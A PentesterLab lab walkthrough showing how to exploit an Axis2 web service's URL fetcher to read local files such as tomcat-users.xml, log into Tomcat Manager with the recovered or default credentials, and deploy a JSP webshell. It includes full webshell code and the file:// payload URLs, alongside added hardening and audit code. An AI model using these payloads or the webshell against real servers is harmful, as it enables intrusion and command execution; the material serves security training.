Axis2 and Tomcat Manager

Date post: 21-Oct-2015
Description: This exercise explains the interactions between Tomcat and Apache, then shows you how to call and attack an Axis2 Web service. Using information retrieved from this attack, you will be able to gain access to the Tomcat Manager and deploy a WebShell to gain command execution.
AXIS2 AND TOMCAT MANAGER By Louis Nyffenegger <[email protected]>

Table of Content

Introduction
About this exercise
  License
  Syntax of this course
  The web application
Tomcat and Apache
  Architecture
  Retrieving Tomcat version
Attacking Axis2
  Retrieving information from the WSDL
  Calling Axis2 services: the easy way
  Calling Axis2 services: the hard way
  Java URL class
Attacking the Tomcat Manager
  Introduction to the Tomcat Manager
  Default Manager's credentials
  Accessing the Manager using the vulnerability found previously
  Deploying a WebShell
    Building a WebShell
    Deploying a WebShell and Commands execution
Conclusion

PentesterLab.com » Axis2 and Tomcat Manager

Introduction

This course details the exploitation of an issue in an Axis2 Web service and how, using this issue, it is possible to retrieve arbitrary files. We will then see how an attacker can retrieve the Tomcat users file to access the Tomcat Manager and gain command execution on the server.


About this exercise

License

This exercise by PentesterLab is licensed under the Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-nd/3.0/.


Syntax of this course

The red boxes provide information on mistakes/issues that are likely to happen while testing:

An issue that you may encounter...

The green boxes provide tips and information if you want to go further.

You should probably check...

The blue boxes are "homework": things you can work on once you are done with this exercise:

You should probably work on...

The web application

Once the system has booted, you can then retrieve the current IP address of the system using the command ifconfig:


$ ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 52:54:00:12:34:56
          inet addr:10.0.2.15  Bcast:10.0.2.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:ff:fe12:3456/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:88 errors:0 dropped:0 overruns:0 frame:0
          TX packets:77 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:10300 (10.0 KiB)  TX bytes:10243 (10.0 KiB)
          Interrupt:11 Base address:0x8000

In this example the IP address is 10.0.2.15.

Throughout the training, the hostname vulnerable is used for the vulnerable machine. You can either replace it by the IP address of the machine, or you can just add an entry to your hosts file with this name and the corresponding IP address. It can be easily done by modifying:

on Windows, your C:\Windows\System32\Drivers\etc\hosts file;

on Unix/Linux and Mac OS X, your /etc/hosts file.

The IP address can change if you restart the system, don't forget to update your hosts file.


Tomcat and Apache

Architecture

On Unix/Linux systems, Tomcat cannot be run on port 80 unless you give root access to the application server (Tomcat), which is not a good idea since Tomcat does not drop privileges and will keep running as root (as opposed to Apache, which drops privileges during startup). However, to be reachable by most users, the server needs to be available on port 80; that is one of the reasons people use Apache to "proxy" requests to Tomcat. This configuration can also be used to:

serve static content directly from Apache and limit Tomcat's load;

load balance requests between two or more Tomcat servers.


The Apache and Tomcat servers can be on the same host or on different hosts; this can be confusing once you gain command execution on the Tomcat server and realise that its configuration does not match what you see on the Apache end.

There are two common ways to "proxy" requests from Apache to Tomcat:

http_proxy: the requests are forwarded to Tomcat using the HTTP protocol;

ajp13: the requests are forwarded to Tomcat using the AJP13 protocol. This configuration is used in this exercise using the Apache module mod_jk.

You should look into CVE-2007-0450 and CVE-2007-1860, these vulnerabilities impact old versions of Tomcat/mod_jk and can potentially allow an attacker to gain access to the Tomcat Manager even if it is not directly exposed by Apache.

Here, the page's title gives away that Tomcat is involved in this web stack; however the HTTP headers only give information on the Apache server in front of it:


% telnet vulnerable 80
Connected to vulnerable.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 26 Dec 2012 08:48:22 GMT
Server: Apache/2.2.16 (Debian)
[...]

Retrieving Tomcat version

It is always a good idea to retrieve the version of Tomcat to check if it is affected by any vulnerability. You can retrieve the version by accessing a non-existing page to generate a 404 error page:


Attacking Axis2

Axis2 is a project from the Apache Foundation; it allows developers to create Web services in C and in Java.

By default, Axis2 gets deployed in /axis2/ (when developers use axis2.war); you can easily retrieve a list of the available services by visiting the page http://vulnerable/axis2/services/listServices:


If we did not know that the server was hosting a Web service using Axis2, we could try to use a directory buster like wfuzz to find out. However, wfuzz's default wordlists don't contain axis2, which is why it is always a good idea to keep your own list with paths of common applications and frameworks.

Retrieving information from the WSDL

The Web Services Description Language describes the functionalities offered by a web service. A WSDL description of a web service (XML based) provides the methods that can be called, what parameters they expect and what values they will return.

The WSDL information can be accessed by clicking the service's name in the listServices page or directly using the following URL: http://vulnerable/axis2/services/ProxyService?wsdl.

You can find a list of methods by searching for the keyword operation in the portType section of the WSDL. In this file, we can see that only one operation is defined (get):

[...]
<wsdl:portType name="ProxyServicePortType">
  <wsdl:operation name="get">
    <wsdl:input message="tns:getRequest" wsaw:Action="urn:get"/>
    <wsdl:output message="tns:getResponse" wsaw:Action="urn:getResponse"/>
  </wsdl:operation>
</wsdl:portType>
[...]

This operation is defined multiple times in the file, once for each different way to access it. We can see that this get operation uses a tns:getRequest and sends back a tns:getResponse. We are mostly interested in what we need to send to the service.


Above the operation declaration, we can see how the getRequest message is defined:

<wsdl:message name="getRequest">
  <wsdl:part name="parameters" element="ns:get"/>
</wsdl:message>

and that this value is declared above in the WSDL file with a parameter named uri, and that this parameter is a string:

[...]
<xs:element name="get">
  <xs:complexType>
    <xs:sequence>
      <xs:element minOccurs="0" name="uri" nillable="true" type="xs:string"/>
    </xs:sequence>
  </xs:complexType>
</xs:element>
[...]

Gathering this information is mostly guesswork and will depend on the WSDL file created by a given framework/tool; however, we now have everything we need to call the Web service.

Calling Axis2 services: the easy way


Axis2 provides an easy way to call Web services: you just need to follow the pattern http://[WS_URL]/method?parameters. In our example, we can use this to call our Web service: http://vulnerable/axis2/services/ProxyService/get?uri=https://pentesterlab.com/. We can see that the return value is the homepage of the website PentesterLab.

Calling Axis2 services: the hard way

For complex Web services (such as Web services with complex parameter types), it is better to generate a client using Axis2.

From my experience, it is often (always) better to use the same library used by the server to limit any problem of interoperability between two libraries written in different languages or using different specifications.

You can find more information on how to generate a client using Axis2 by following the documentation on the Axis2 website: http://axis.apache.org/axis2/java/core/docs/userguide-creatingclients.html.

Java URL class


We can see that this Web service uses the URL provided to retrieve content and echoes it back in the response. The easiest way to do that is the URL class in Java. We can probably use the URL class behaviour to get more than just a website's content...

The URL class can also be used as a port scanner if the developer didn't limit the ports you can have access to. You can try to access http://vulnerable/axis2/services/ProxyService/get?uri=http://localhost:22/ to see what version of OpenSSH is used.

The Java URL class is a really handy class that allows a developer to fetch and retrieve content. This class supports the following protocols:

http://

https://

ftp://

file://

...


The first example is the most common use of this class and is often used as a proxy to retrieve resources and bypass the same origin policy. The file:// protocol is less known and allows an attacker to retrieve arbitrary files on the file system (limited by the application server's privileges).

We can exploit this behaviour to retrieve /etc/passwd by accessing the following URL http://vulnerable/axis2/services/ProxyService/get?uri=file:///etc/passwd, and we can see the content of /etc/passwd in the response:

You should try to setup Apache and Tomcat using mod_jk and try to create a simple Axis2 HelloWorld Web service or an Axis2 Web service that returns the current time. You can check the configuration of Apache, Tomcat and Axis2 on the ISO to get an idea on how to do it.
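As an added illustration (not code from the exercise; the real ProxyService source is not shown here), the fetch pattern the service appears to follow, beside a hardened version that allow-lists the scheme and port and refuses destinations resolving to loopback or internal addresses. ProxyFetcher and its method names are hypothetical, and the code assumes Java 9 or later (readAllBytes, Set.of).

```java
import java.io.IOException;
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.InetAddress;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Set;

// Hypothetical class: the exercise's real ProxyService source is not shown on the page.
public class ProxyFetcher {
    // The behaviour the exercise exploits: the caller-supplied scheme is honoured as-is,
    // so file:///etc/passwd is read with the privileges of the Tomcat process.
    public static String getUnsafe(String uri) throws IOException {
        try (InputStream in = new URL(uri).openStream()) {
            return new String(in.readAllBytes(), StandardCharsets.UTF_8);
        }
    }
    private static final Set<String> ALLOWED_SCHEMES = Set.of("http", "https");
    private static final Set<Integer> ALLOWED_PORTS = Set.of(80, 443);

    // Hardened version: allow-list scheme and port, then refuse hosts that resolve to
    // loopback, link-local, site-local (RFC 1918) or wildcard addresses, so the service
    // can neither read local files nor probe localhost:22 or the internal network.
    // The resolve-then-connect split still leaves a DNS rebinding window; pin the address if that matters.
    public static String getSafe(String uri) throws IOException {
        URL url = new URL(uri);
        if (!ALLOWED_SCHEMES.contains(url.getProtocol().toLowerCase())) {
            throw new IllegalArgumentException("scheme not allowed: " + url.getProtocol());
        }
        int port = url.getPort() == -1 ? url.getDefaultPort() : url.getPort();
        if (!ALLOWED_PORTS.contains(port)) {
            throw new IllegalArgumentException("port not allowed: " + port);
        }
        for (InetAddress addr : InetAddress.getAllByName(url.getHost())) {
            if (addr.isAnyLocalAddress() || addr.isLoopbackAddress()
                    || addr.isLinkLocalAddress() || addr.isSiteLocalAddress()) {
                throw new IllegalArgumentException("destination not allowed: " + addr);
            }
        }
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        conn.setInstanceFollowRedirects(false); // a 302 to localhost would bypass the checks above
        conn.setConnectTimeout(5000);
        conn.setReadTimeout(5000);
        try (InputStream in = conn.getInputStream()) {
            return new String(in.readAllBytes(), StandardCharsets.UTF_8);
        }
    }

    public static void main(String[] args) {
        // Constructed probes: the two URIs the exercise uses plus the lab's own RFC 1918 address.
        for (String p : new String[] {"file:///etc/passwd", "http://localhost:22/", "http://10.0.2.15/"}) {
            try { getSafe(p); System.out.println("allowed:  " + p); }
            catch (IllegalArgumentException | IOException e) { System.out.println("rejected: " + p + " (" + e.getMessage() + ")"); }
        }
    }
}
```

All three probes are rejected before any connection is opened, so the demonstration runs offline.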


Attacking the Tomcat Manager

Introduction to the Tomcat Manager

The Tomcat Manager can be found at the following URL: http://vulnerable/manager/html.

Tomcat Manager is used to deploy web applications within Tomcat. Tomcat Manager is protected by a password and should not be installed on production servers.

The file containing the passwords is named tomcat-users.xml and is stored inside $CATALINA_HOME/conf/ on most systems. This file looks like:


<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
  <user username="admin" password="s3cret" roles="manager-gui"/>
</tomcat-users>

Debian has its own way of installing most software and tries to put configuration files in /etc. Tomcat installed through Debian's packaging system will follow this rule and the file tomcat-users.xml will be stored in /etc/tomcat6/ (for the current version of Debian stable).

We can see here that users have a role; it's a really important part of the Manager application since you will need a user with the role manager (for versions before 6.0.30) or manager-gui (for later versions) to access the manager and deploy an application. Other "manager" roles can also be used, but the deployment is more complex.

For example, if you log in using tomcat with the password tomcat, you will get an HTTP 403 response:


Default Manager's credentials

In past versions of Tomcat, the Manager used to be shipped with default accounts. However, for obvious security reasons, newer versions of Tomcat are not shipped with default accounts (secure by default).

In the past, the following accounts were common:


Username    Password
tomcat      tomcat
admin       (blank)
admin       manager
admin       password
admin       s3cret
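An added audit helper, not part of the exercise or of Tomcat, that reads a tomcat-users.xml (the example file above embedded as constructed input) and flags users whose roles reach the Manager and whose passwords appear in the table of historical defaults above. TomcatUsersAudit is hypothetical; MANAGER_ROLES lists the role the page names for versions before 6.0.30 and the split roles (manager-gui, manager-script, manager-jmx, manager-status) that later versions use.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.Set;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

// Hypothetical audit helper; not part of the exercise or of Tomcat.
public class TomcatUsersAudit {
    // Constructed sample input, copied from the exercise's example tomcat-users.xml.
    static final String SAMPLE = "<tomcat-users>"
        + "<role rolename=\"manager-gui\"/>"
        + "<user username=\"tomcat\" password=\"tomcat\" roles=\"tomcat\"/>"
        + "<user username=\"admin\" password=\"s3cret\" roles=\"manager-gui\"/>"
        + "</tomcat-users>";
    // Roles that reach the Manager: "manager" before 6.0.30, the split roles from 6.0.30 onwards.
    static final Set<String> MANAGER_ROLES = Set.of(
        "manager", "manager-gui", "manager-script", "manager-jmx", "manager-status");
    // Username/password pairs from the table of historically common defaults above.
    static final Map<String, Set<String>> DEFAULTS = Map.of(
        "tomcat", Set.of("tomcat"),
        "admin", Set.of("", "admin", "manager", "password", "s3cret"));

    public static List<String> audit(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // The file is trusted config, but refuse DOCTYPEs anyway so the auditor is not an XXE sink.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        NodeList users = f.newDocumentBuilder()
            .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)))
            .getElementsByTagName("user");
        List<String> findings = new ArrayList<>();
        for (int i = 0; i < users.getLength(); i++) {
            Element u = (Element) users.item(i);
            String name = u.getAttribute("username"), pw = u.getAttribute("password");
            boolean manager = false;
            for (String r : u.getAttribute("roles").split(",")) {
                if (MANAGER_ROLES.contains(r.trim())) manager = true;
            }
            boolean known = DEFAULTS.getOrDefault(name, Set.of()).contains(pw);
            if (manager && known) {
                findings.add("CRITICAL " + name + ": Manager role with a well-known default password");
            } else if (manager) {
                findings.add("INFO " + name + ": can deploy applications; rotate the password if the Manager is exposed");
            } else if (known) {
                findings.add("WARN " + name + ": default password (no Manager role, so the Manager answers 403)");
            }
        }
        return findings;
    }

    public static void main(String[] args) throws Exception {
        audit(SAMPLE).forEach(System.out::println);
    }
}
```

On the sample file this reports admin as CRITICAL and tomcat as WARN, matching the 403 the exercise shows for tomcat/tomcat.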

Accessing the Manager using the vulnerability found previously

On Debian, by default, the tomcat-users.xml file is located in /etc/tomcat6; the version retrieved previously confirms this. Using the vulnerability discovered in the Axis2 Web service, we can retrieve this file.

If the file was stored somewhere else, you can either brute force the path or try to gather more information on the application to find where Tomcat is located on the system.


By default on Debian, this file can only be read by root and by members of the group tomcat6, but since the vulnerability gives us the same access as the Tomcat server, we can read the content of this file. It's possible to retrieve tomcat-users.xml by accessing the following URL: http://vulnerable/axis2/services/ProxyService/get?uri=file:///etc/tomcat6/tomcat-users.xml. You can then retrieve the password of the manager user and access the Tomcat Manager.

Deploying a WebShell

In this section, we are going to see how we can build and deploy a WebShell to gain command execution on the server.

Building a WebShell

To build a WebShell, we will need to write the WebShell and package it as a war file. To write the WebShell, we can either use JSP or a Servlet. To keep things simple, we are going to build a JSP WebShell; the following code can be used:


<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
  String cmd = request.getParameter("cmd");
  String output = "";
  if(cmd != null) {
    String s = null;
    try {
      Process p = Runtime.getRuntime().exec(cmd,null,null);
      BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
      while((s = sI.readLine()) != null) {
        output += s+"</br>";
      }
    } catch(IOException e) {
      e.printStackTrace();
    }
  }
%>
<pre><%=output %></pre>

We can now create a directory named webshell and put our file (index.jsp) inside it:

$ mkdir webshell
$ cp index.jsp webshell

Now we can build the war file using jar (provided with Java):


$ cd webshell
$ jar -cvf ../webshell.war *
added manifest
adding: index.jsp(in = 579) (out= 351)(deflated 39%)

Our webshell (webshell.war) is now packaged and we can upload it using the Tomcat Manager.

Deploying a WebShell and Commands execution

To deploy the WebShell, you just need to select the war file you just created and upload it to the server using the Manager. The section of the page used to deploy a new web application allows you to directly select your war file:


Once the Webshell is deployed, you should see it in the Manager:


You just need to click the link to access it and you can start running arbitrary commands:


Conclusion

This exercise explained how to get access to an Axis2 Web service and how the Java URL class can be used to retrieve arbitrary files if no checks are performed on the protocol in use. Once you can retrieve arbitrary files, you can target configuration files to gather sensitive information and passwords. Once you have credentials, you can easily access the administration interface of the application server and deploy a custom web application to run arbitrary commands on the system.
